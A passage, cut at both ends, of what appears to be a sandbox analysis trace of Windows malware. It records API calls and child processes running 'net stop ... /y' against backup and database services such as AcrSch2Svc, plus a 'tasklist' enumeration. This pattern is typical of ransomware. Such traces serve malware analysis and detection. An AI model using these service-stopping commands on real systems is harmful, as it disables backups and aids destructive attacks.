_String2="ReportServer$TPSAMA") returned -2 [0046.813] _wcsicmp (_String1="devrdr", _String2="ReportServer$TPSAMA") returned -14 [0046.813] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$TPSAMA") returned -6 [0046.813] _wcsicmp (_String1="server", _String2="ReportServer$TPSAMA") returned 1 [0046.813] _wcsicmp (_String1="svr", _String2="ReportServer$TPSAMA") returned 1 [0046.813] _wcsicmp (_String1="srv", _String2="ReportServer$TPSAMA") returned 1 [0046.813] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$TPSAMA") returned -6 [0046.813] _wcsicmp (_String1="alerter", _String2="ReportServer$TPSAMA") returned -17 [0046.813] _wcsicmp (_String1="netlogon", _String2="ReportServer$TPSAMA") returned -4 [0046.813] _wcsupr (in: _String="ReportServer$TPSAMA" | out: _String="REPORTSERVER$TPSAMA") returned="REPORTSERVER$TPSAMA" [0046.813] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5854f0 [0046.816] GetServiceKeyNameW (in: hSCManager=0x5854f0, lpDisplayName="REPORTSERVER$TPSAMA", lpServiceName=0xdaaf0, lpcchBuffer=0x1efdd8 | out: lpServiceName="", lpcchBuffer=0x1efdd8) returned 0 [0046.817] _wcsicmp (_String1="msg", _String2="REPORTSERVER$TPSAMA") returned -5 [0046.817] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$TPSAMA") returned -5 [0046.817] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$TPSAMA") returned -13 [0046.817] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$TPSAMA") returned -2 [0046.817] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$TPSAMA") returned -12 [0046.817] _wcsicmp (_String1="redir", _String2="REPORTSERVER$TPSAMA") returned -12 [0046.817] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$TPSAMA") returned -1 [0046.817] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$TPSAMA") returned 5 [0046.817] _wcsicmp (_String1="work", _String2="REPORTSERVER$TPSAMA") returned 5 [0046.817] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$TPSAMA") returned 5 [0046.817] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$TPSAMA") returned -2 [0046.817] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$TPSAMA") returned -14 [0046.817] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$TPSAMA") returned -6 [0046.817] _wcsicmp (_String1="server", _String2="REPORTSERVER$TPSAMA") returned 1 [0046.817] _wcsicmp (_String1="svr", _String2="REPORTSERVER$TPSAMA") returned 1 [0046.817] _wcsicmp (_String1="srv", _String2="REPORTSERVER$TPSAMA") returned 1 [0046.817] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$TPSAMA") returned -6 [0046.817] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$TPSAMA") returned -17 [0046.817] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$TPSAMA") returned -4 [0046.817] NetServiceControl (in: servername=0x0, service="REPORTSERVER$TPSAMA", opcode=0x0, arg=0x0, bufptr=0x1efdd4 | out: bufptr=0x1efdd4) returned 0x889 [0046.818] wcscpy_s (in: _Destination=0xda4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0046.818] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0046.819] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xdb338, nSize=0x800, Arguments=0xd9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0046.820] GetFileType (hFile=0x26c) returned 0x3 [0046.820] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x584020 [0046.820] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x584020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nW", lpUsedDefaultChar=0x0) returned 30 [0046.820] WriteFile (in: hFile=0x26c, lpBuffer=0x584020*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1efd14, lpOverlapped=0x0 | out: lpBuffer=0x584020*, lpNumberOfBytesWritten=0x1efd14*=0x1e, lpOverlapped=0x0) returned 1 [0046.820] LocalFree (hMem=0x584020) returned 0x0 [0046.820] GetFileType (hFile=0x26c) returned 0x3 [0046.820] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5862c8 [0046.820] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5862c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nX", lpUsedDefaultChar=0x0) returned 2 [0046.820] WriteFile (in: hFile=0x26c, lpBuffer=0x5862c8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efd14, lpOverlapped=0x0 | out: lpBuffer=0x5862c8*, lpNumberOfBytesWritten=0x1efd14*=0x2, lpOverlapped=0x0) returned 1 [0046.820] LocalFree (hMem=0x5862c8) returned 0x0 [0046.820] _ultow (in: _Dest=0x889, _Radix=2030916 | out: _Dest=0x889) returned="2185" [0046.820] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xdb338, nSize=0x800, Arguments=0xd9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0046.821] GetFileType (hFile=0x26c) returned 0x3 [0046.821] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5862c8 [0046.821] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5862c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0046.821] WriteFile (in: hFile=0x26c, lpBuffer=0x5862c8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1efd20, lpOverlapped=0x0 | out: lpBuffer=0x5862c8*, lpNumberOfBytesWritten=0x1efd20*=0x34, lpOverlapped=0x0) returned 1 [0046.821] LocalFree (hMem=0x5862c8) returned 0x0 [0046.821] GetFileType (hFile=0x26c) returned 0x3 [0046.821] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5862c8 [0046.821] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5862c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nX", lpUsedDefaultChar=0x0) returned 2 [0046.821] WriteFile (in: hFile=0x26c, lpBuffer=0x5862c8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efd20, lpOverlapped=0x0 | out: lpBuffer=0x5862c8*, lpNumberOfBytesWritten=0x1efd20*=0x2, lpOverlapped=0x0) returned 1 [0046.821] LocalFree (hMem=0x5862c8) returned 0x0 [0046.821] NetApiBufferFree (Buffer=0x581c80) returned 0x0 [0046.821] NetApiBufferFree (Buffer=0x581c98) returned 0x0 [0046.821] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$TPSAMA /y" [0046.821] exit (_Code=2) Process: id = "93" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x45fbe000" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop swi_update /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 161 os_tid = 0x920 Process: id = "94" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x46b28000" os_pid = "0x950" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "93" os_parent_pid = "0x928" cmd_line = "C:\\Windows\\system32\\net1 stop swi_update /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 162 os_tid = 0x91c [0046.971] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31f854 | out: lpSystemTimeAsFileTime=0x31f854*(dwLowDateTime=0xe6328ac0, dwHighDateTime=0x1d57a86)) [0046.971] GetCurrentProcessId () returned 0x950 [0046.971] GetCurrentThreadId () returned 0x91c [0046.971] GetTickCount () returned 0x1146b32 [0046.971] QueryPerformanceCounter (in: lpPerformanceCount=0x31f84c | out: lpPerformanceCount=0x31f84c*=16725611007) returned 1 [0046.972] GetModuleHandleA (lpModuleName=0x0) returned 0x40000 [0046.972] __set_app_type (_Type=0x1) [0046.972] __p__fmode () returned 0x74eb31f4 [0046.972] __p__commode () returned 0x74eb31fc [0046.972] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ffe6) returned 0x0 [0046.972] __getmainargs (in: _Argc=0x59064, _Argv=0x5906c, _Env=0x59068, _DoWildCard=0, _StartInfo=0x59024 | out: _Argc=0x59064, _Argv=0x5906c, _Env=0x59068) returned 0 [0046.972] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.972] GetConsoleOutputCP () returned 0x1b5 [0046.973] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x59080 | out: lpCPInfo=0x59080) returned 1 [0046.973] SetThreadUILanguage (LangId=0x0) returned 0x409 [0046.977] sprintf_s (in: _DstBuf=0x31f80c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0046.977] setlocale (category=0, locale=".437") returned="English_United States.437" [0046.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0046.979] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0046.979] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_update /y" [0046.979] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31f5d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0046.979] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x68) returned 0x443c10 [0046.979] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0046.979] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31f7dc | out: Buffer=0x31f7dc*=0x441c70) returned 0x0 [0046.979] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31f7dc | out: Buffer=0x31f7dc*=0x441c88) returned 0x0 [0046.979] _fileno (_File=0x74eb2900) returned -2 [0046.979] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0046.979] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0046.979] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0046.979] _wcsicmp (_String1="config", _String2="stop") returned -16 [0046.979] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0046.979] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0046.979] _wcsicmp (_String1="file", _String2="stop") returned -13 [0046.979] _wcsicmp (_String1="files", _String2="stop") returned -13 [0046.980] _wcsicmp (_String1="group", _String2="stop") returned -12 [0046.980] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0046.980] _wcsicmp (_String1="help", _String2="stop") returned -11 [0046.980] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0046.980] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0046.980] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0046.980] _wcsicmp (_String1="session", _String2="stop") returned -15 [0046.980] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0046.980] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0046.980] _wcsicmp (_String1="share", _String2="stop") returned -12 [0046.980] _wcsicmp (_String1="start", _String2="stop") returned -14 [0046.980] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0046.980] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0046.980] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0046.980] _wcsicmp (_String1="accounts", _String2="swi_update") returned -18 [0046.980] _wcsicmp (_String1="computer", _String2="swi_update") returned -16 [0046.980] _wcsicmp (_String1="config", _String2="swi_update") returned -16 [0046.980] _wcsicmp (_String1="continue", _String2="swi_update") returned -16 [0046.980] _wcsicmp (_String1="cont", _String2="swi_update") returned -16 [0046.980] _wcsicmp (_String1="file", _String2="swi_update") returned -13 [0046.980] _wcsicmp (_String1="files", _String2="swi_update") returned -13 [0046.980] _wcsicmp (_String1="group", _String2="swi_update") returned -12 [0046.980] _wcsicmp (_String1="groups", _String2="swi_update") returned -12 [0046.980] _wcsicmp (_String1="help", _String2="swi_update") returned -11 [0046.980] _wcsicmp (_String1="helpmsg", _String2="swi_update") returned -11 [0046.980] _wcsicmp (_String1="localgroup", _String2="swi_update") returned -7 [0046.980] _wcsicmp (_String1="pause", _String2="swi_update") returned -3 [0046.980] _wcsicmp (_String1="session", _String2="swi_update") returned -18 [0046.980] _wcsicmp (_String1="sessions", _String2="swi_update") returned -18 [0046.980] _wcsicmp (_String1="sess", _String2="swi_update") returned -18 [0046.980] _wcsicmp (_String1="share", _String2="swi_update") returned -15 [0046.980] _wcsicmp (_String1="start", _String2="swi_update") returned -3 [0046.980] _wcsicmp (_String1="stats", _String2="swi_update") returned -3 [0046.980] _wcsicmp (_String1="statistics", _String2="swi_update") returned -3 [0046.980] _wcsicmp (_String1="stop", _String2="swi_update") returned -3 [0046.980] _wcsicmp (_String1="time", _String2="swi_update") returned 1 [0046.980] _wcsicmp (_String1="user", _String2="swi_update") returned 2 [0046.981] _wcsicmp (_String1="users", _String2="swi_update") returned 2 [0046.981] _wcsicmp (_String1="msg", _String2="swi_update") returned -6 [0046.981] _wcsicmp (_String1="messenger", _String2="swi_update") returned -6 [0046.981] _wcsicmp (_String1="receiver", _String2="swi_update") returned -1 [0046.981] _wcsicmp (_String1="rcv", _String2="swi_update") returned -1 [0046.981] _wcsicmp (_String1="netpopup", _String2="swi_update") returned -5 [0046.981] _wcsicmp (_String1="redirector", _String2="swi_update") returned -1 [0046.981] _wcsicmp (_String1="redir", _String2="swi_update") returned -1 [0046.981] _wcsicmp (_String1="rdr", _String2="swi_update") returned -1 [0046.981] _wcsicmp (_String1="workstation", _String2="swi_update") returned 4 [0046.981] _wcsicmp (_String1="work", _String2="swi_update") returned 4 [0046.981] _wcsicmp (_String1="wksta", _String2="swi_update") returned 4 [0046.981] _wcsicmp (_String1="prdr", _String2="swi_update") returned -3 [0046.981] _wcsicmp (_String1="devrdr", _String2="swi_update") returned -15 [0046.981] _wcsicmp (_String1="lanmanworkstation", _String2="swi_update") returned -7 [0046.981] _wcsicmp (_String1="server", _String2="swi_update") returned -18 [0046.981] _wcsicmp (_String1="svr", _String2="swi_update") returned -1 [0046.981] _wcsicmp (_String1="srv", _String2="swi_update") returned -5 [0046.981] _wcsicmp (_String1="lanmanserver", _String2="swi_update") returned -7 [0046.981] _wcsicmp (_String1="alerter", _String2="swi_update") returned -18 [0046.981] _wcsicmp (_String1="netlogon", _String2="swi_update") returned -5 [0046.981] _wcsupr (in: _String="swi_update" | out: _String="SWI_UPDATE") returned="SWI_UPDATE" [0046.981] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4454c8 [0046.984] GetServiceKeyNameW (in: hSCManager=0x4454c8, lpDisplayName="SWI_UPDATE", lpServiceName=0x5aaf0, lpcchBuffer=0x31f778 | out: lpServiceName="", lpcchBuffer=0x31f778) returned 0 [0046.984] _wcsicmp (_String1="msg", _String2="SWI_UPDATE") returned -6 [0046.984] _wcsicmp (_String1="messenger", _String2="SWI_UPDATE") returned -6 [0046.984] _wcsicmp (_String1="receiver", _String2="SWI_UPDATE") returned -1 [0046.985] _wcsicmp (_String1="rcv", _String2="SWI_UPDATE") returned -1 [0046.985] _wcsicmp (_String1="redirector", _String2="SWI_UPDATE") returned -1 [0046.985] _wcsicmp (_String1="redir", _String2="SWI_UPDATE") returned -1 [0046.985] _wcsicmp (_String1="rdr", _String2="SWI_UPDATE") returned -1 [0046.985] _wcsicmp (_String1="workstation", _String2="SWI_UPDATE") returned 4 [0046.985] _wcsicmp (_String1="work", _String2="SWI_UPDATE") returned 4 [0046.985] _wcsicmp (_String1="wksta", _String2="SWI_UPDATE") returned 4 [0046.985] _wcsicmp (_String1="prdr", _String2="SWI_UPDATE") returned -3 [0046.985] _wcsicmp (_String1="devrdr", _String2="SWI_UPDATE") returned -15 [0046.985] _wcsicmp (_String1="lanmanworkstation", _String2="SWI_UPDATE") returned -7 [0046.985] _wcsicmp (_String1="server", _String2="SWI_UPDATE") returned -18 [0046.985] _wcsicmp (_String1="svr", _String2="SWI_UPDATE") returned -1 [0046.985] _wcsicmp (_String1="srv", _String2="SWI_UPDATE") returned -5 [0046.985] _wcsicmp (_String1="lanmanserver", _String2="SWI_UPDATE") returned -7 [0046.985] _wcsicmp (_String1="alerter", _String2="SWI_UPDATE") returned -18 [0046.985] _wcsicmp (_String1="netlogon", _String2="SWI_UPDATE") returned -5 [0046.985] NetServiceControl (in: servername=0x0, service="SWI_UPDATE", opcode=0x0, arg=0x0, bufptr=0x31f774 | out: bufptr=0x31f774) returned 0x889 [0046.986] wcscpy_s (in: _Destination=0x5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0046.986] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0046.986] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x5b338, nSize=0x800, Arguments=0x59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0046.987] GetFileType (hFile=0x26c) returned 0x3 [0046.987] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x443ff8 [0046.988] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x443ff8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0046.988] WriteFile (in: hFile=0x26c, lpBuffer=0x443ff8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x31f6b4, lpOverlapped=0x0 | out: lpBuffer=0x443ff8*, lpNumberOfBytesWritten=0x31f6b4*=0x1e, lpOverlapped=0x0) returned 1 [0046.988] LocalFree (hMem=0x443ff8) returned 0x0 [0046.988] GetFileType (hFile=0x26c) returned 0x3 [0046.988] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4462a0 [0046.988] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4462a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nD", lpUsedDefaultChar=0x0) returned 2 [0046.988] WriteFile (in: hFile=0x26c, lpBuffer=0x4462a0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f6b4, lpOverlapped=0x0 | out: lpBuffer=0x4462a0*, lpNumberOfBytesWritten=0x31f6b4*=0x2, lpOverlapped=0x0) returned 1 [0046.988] LocalFree (hMem=0x4462a0) returned 0x0 [0046.988] _ultow (in: _Dest=0x889, _Radix=3274468 | out: _Dest=0x889) returned="2185" [0046.988] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x5b338, nSize=0x800, Arguments=0x59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0046.988] GetFileType (hFile=0x26c) returned 0x3 [0046.988] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4462a0 [0046.988] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4462a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0046.988] WriteFile (in: hFile=0x26c, lpBuffer=0x4462a0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x31f6c0, lpOverlapped=0x0 | out: lpBuffer=0x4462a0*, lpNumberOfBytesWritten=0x31f6c0*=0x34, lpOverlapped=0x0) returned 1 [0046.988] LocalFree (hMem=0x4462a0) returned 0x0 [0046.988] GetFileType (hFile=0x26c) returned 0x3 [0046.988] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4462a0 [0046.988] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4462a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nD", lpUsedDefaultChar=0x0) returned 2 [0046.988] WriteFile (in: hFile=0x26c, lpBuffer=0x4462a0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f6c0, lpOverlapped=0x0 | out: lpBuffer=0x4462a0*, lpNumberOfBytesWritten=0x31f6c0*=0x2, lpOverlapped=0x0) returned 1 [0046.988] LocalFree (hMem=0x4462a0) returned 0x0 [0046.989] NetApiBufferFree (Buffer=0x441c70) returned 0x0 [0046.989] NetApiBufferFree (Buffer=0x441c88) returned 0x0 [0046.989] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_update /y" [0046.989] exit (_Code=2) Process: id = "95" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x46adf000" os_pid = "0x964" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x8dc" cmd_line = "\"tasklist\" /v /fo csv" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 163 os_tid = 0xb0 Thread: id = 172 os_tid = 0xa04 Thread: id = 176 os_tid = 0x8c4 Thread: id = 178 os_tid = 0x8c0 Thread: id = 179 os_tid = 0x9f8 Process: id = "96" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x455c3000" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop AcrSch2Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 164 os_tid = 0x9ec Process: id = "97" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x462d0000" os_pid = "0x968" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "96" os_parent_pid = "0x9f4" cmd_line = "C:\\Windows\\system32\\net1 stop AcrSch2Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 165 os_tid = 0x95c [0047.285] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13ff08 | out: lpSystemTimeAsFileTime=0x13ff08*(dwLowDateTime=0xe64f1b40, dwHighDateTime=0x1d57a86)) [0047.285] GetCurrentProcessId () returned 0x968 [0047.285] GetCurrentThreadId () returned 0x95c [0047.285] GetTickCount () returned 0x1146bed [0047.285] QueryPerformanceCounter (in: lpPerformanceCount=0x13ff00 | out: lpPerformanceCount=0x13ff00*=16757005771) returned 1 [0047.286] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0047.286] __set_app_type (_Type=0x1) [0047.286] __p__fmode () returned 0x74eb31f4 [0047.286] __p__commode () returned 0x74eb31fc [0047.286] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x94ffe6) returned 0x0 [0047.286] __getmainargs (in: _Argc=0x959064, _Argv=0x95906c, _Env=0x959068, _DoWildCard=0, _StartInfo=0x959024 | out: _Argc=0x959064, _Argv=0x95906c, _Env=0x959068) returned 0 [0047.286] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0047.286] GetConsoleOutputCP () returned 0x1b5 [0047.286] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x959080 | out: lpCPInfo=0x959080) returned 1 [0047.286] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.289] sprintf_s (in: _DstBuf=0x13fec0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0047.290] setlocale (category=0, locale=".437") returned="English_United States.437" [0047.291] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0047.291] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0047.292] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcrSch2Svc /y" [0047.292] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13fc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0047.292] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x68) returned 0x5c3c10 [0047.292] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0047.292] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13fe90 | out: Buffer=0x13fe90*=0x5c1c70) returned 0x0 [0047.292] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13fe90 | out: Buffer=0x13fe90*=0x5c1c88) returned 0x0 [0047.292] _fileno (_File=0x74eb2900) returned -2 [0047.292] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0047.292] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0047.292] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0047.292] _wcsicmp (_String1="config", _String2="stop") returned -16 [0047.292] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0047.292] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0047.292] _wcsicmp (_String1="file", _String2="stop") returned -13 [0047.292] _wcsicmp (_String1="files", _String2="stop") returned -13 [0047.292] _wcsicmp (_String1="group", _String2="stop") returned -12 [0047.292] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0047.292] _wcsicmp (_String1="help", _String2="stop") returned -11 [0047.292] _wcsicmp 